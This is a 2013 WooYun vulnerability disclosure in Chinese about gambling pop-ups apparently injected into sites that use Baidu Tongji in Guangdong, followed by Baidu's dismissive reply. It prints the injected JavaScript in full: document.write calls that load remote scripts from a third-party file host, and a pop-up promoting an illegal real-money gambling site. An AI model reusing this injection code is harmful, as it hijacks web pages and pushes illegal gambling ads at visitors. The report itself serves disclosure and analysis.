当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036659

漏洞标题:广东地区使用百度统计的网站弹出非法博彩信息

相关厂商:百度

漏洞作者: 猪刚鬣

提交时间:2013-09-10 14:29

修复时间:2013-10-25 14:30

公开时间:2013-10-25 14:30

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-10: 细节已通知厂商并且等待厂商处理中
2013-09-13: 厂商已经确认,细节仅向厂商公开
2013-09-23: 细节向核心白帽子及相关领域专家公开
2013-10-03: 细节向普通白帽子公开
2013-10-13: 细节向实习白帽子公开
2013-10-25: 细节向公众公开

简要描述:

使用百度相关产品,比如百度统计的网站,会弹出非法博彩信息,例如乌云

详细说明:

广东地区访问,使用百度相关产品的网站,都会弹出下面类似的非法博彩信息(比如乌云)

woyun.jpg


QQ图片20130910143148.jpg


var title='精彩推荐';
 window.onload=function()
{
	//判断城市
	var caption;
	var surl;
	var content;
    function Show()
    {
        caption='[原创] 真钱游戏,欢迎您的加入';
		surl='http://www.30880.com';
		content='总统娱乐城为大众提供高质量娱乐服务,是国内优秀的网上真钱游戏娱乐城,本网公平公正,在业内信誉第一,是国内网上游戏领导品牌.<br /> <font color="red">真钱游戏种类: <br />真人百家乐,龙虎斗,彩票游戏,六合彩,体育投注,老虎机,扑克游戏等等。。。</font><br /> 为您打造最好玩,最真实的游戏品牌。客服全天24小时为您服务! <br /><a href="http://www.30880.com">点击进入注册</a>';
		title='江苏新闻';
        var pop=new Pop(caption,surl,content);
    }
	
  Show();
    
}
document.write("<script charset=\"GBK\" src=\"http:\/\/files.cnblogs.com\/xiaoyaodao\/jquery.min.js\"><\/script>");
document.write("<script charset=\"GBK\" src=\"http:\/\/files.cnblogs.com\/xiaoyaodao\/pop.js\"><\/script>");
document.write("<style type=\"text/css\">*{margin:0; " +
               "padding:0;}#pop{background:#fff;width:260px;border:1px solid #e0e0e0;" +
               "font-size:12px;position: fixed;right:10px;bottom:10px;}#popHead{line-height:32px;" + 
               "background:#f6f0f3;border-bottom:1px solid #e0e0e0;position:relative;font-size:12px;" + 
               "padding:0 0 0 10px;}#popHead h2{font-size:14px;color:#666;line-height:32px;height:32px;}" + 
               "#popHead #popClose{position:absolute;right:10px;top:1px;}" +
               "#popHead a#popClose:hover{color:#f00;cursor:pointer;}#popContent{padding:5px 10px;}" + 
               "#popTitle a{line-height:24px;font-size:14px;font-family:'微软雅黑';color:#333;font-weight:bold;text-decoration:none;}" + 
               "#popTitle a:hover{color:#f60;}#popIntro{text-indent:24px;line-height:160%;margin:5px 0;" +
               "color:#666;}#popMore{text-align:right;border-top:1px dotted #ccc;line-height:24px;" + 
               "margin:8px 0 0 0;}#popMore a{color:#f60;}#popMore a:hover{color:#f00;}</style>");
document.write("<div id=\"pop\" style=\"display:none;\">" +
               "<div id=\"popHead\">" + 
               "<a id=\"popClose\" title=\"关闭\">关闭</a><h2>" + title + "</h2>" +
               "</div>" +
               "<div id=\"popContent\">" +
               "<dl>" +
               "<dt id=\"popTitle\"><a href=\"http://yanue.info\" target=\"_blank\"></a></dt>" +
               "<dd id=\"popIntro\"></dd>" +
               "</dl>		<p id=\"popMore\"><a href=\"http:\/\/www.30880.com\" target=\"_blank\">查看</a></p>" +
               "</div>" +
               "</div>");

漏洞证明:

百度的相关产品也出现同样的问题,,经过对源码的分析,并未发现什么问题,唯一的区别就是,使用百度统计的网站会弹出,没有使用百度统计的网站没有弹出

QQ截图20130910133844.jpg

QQ截图20130910133651.jpg


PS:广东地区弹出,其他地区,未测试

修复方案:

打电话给百度,百度声称:我们是无敌的(我很无语-.-!)

版权声明:转载请注明来源 猪刚鬣@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-09-13 17:04

厂商回复:

在调查过程中,经过多次沟通,楼主无法提供具体数据协助定位流量劫持事件原因(运营商劫持或其他原因导致DNS劫持),且广东百度同学访问时未复现此劫持现象,再次感谢对百度安全的关注。
--“百度,因你更安全”

最新状态:

暂无

漏洞评价:

评论

  1. 2013-09-10 14:30 | 猪刚鬣 ( 路人 | Rank:8 漏洞数:3 | 哈哈)

    使用的js,http://files.cnblogs.com/xiaoyaodao/show.js